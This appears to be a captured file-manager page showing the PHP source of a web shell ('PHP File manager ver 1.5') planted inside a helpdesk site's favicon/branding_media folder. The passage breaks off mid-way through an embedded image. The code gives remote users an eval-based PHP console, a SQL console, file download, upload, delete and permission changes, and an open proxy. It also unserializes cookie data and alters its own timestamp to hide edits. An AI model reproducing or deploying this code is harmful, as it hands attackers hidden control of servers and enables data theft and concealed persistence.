File manager - Edit - /var/www/payraty/helpdesk/public/favicon/index.php.tar
Back
var/www/payraty/helpdesk/public/favicon/branding_media/index.php 0000644 00000240677 00000000000 0021077 0 ustar 00 <?php /* PHP File manager ver 1.5 */ // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg_ntimes = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FF7F50 none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FF7F50 none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg_ntimes = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg_ntimes .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg_ntimes .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg_ntimes .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg_ntimes .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg_ntimes .= __('File updated'); } else $msg_ntimes .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg_ntimes .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>FileXXXXXXXXXXX</title> <style> body { background-color: ORANGE; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #5416B4; text-decoration: none; } a.th:active { color: #5416B4; text-decoration: none; } a.th:visited { color: #5416B4; text-decoration: none; } a.th:hover { color: #5416B4; text-decoration: underline; } table.bg { background-color: #B4CE1 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #9600CD; color: #5416B4; font-weight: bold; font-size: 11px; } .row1 { background-color: #F493F2; } .row2 { background-color: #A442DC; } .row3 { background-color: #00B5EC; padding: 5px; } tr.row1:hover { background-color: #A442DC; } tr.row2:hover { background-color: #9600CD; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,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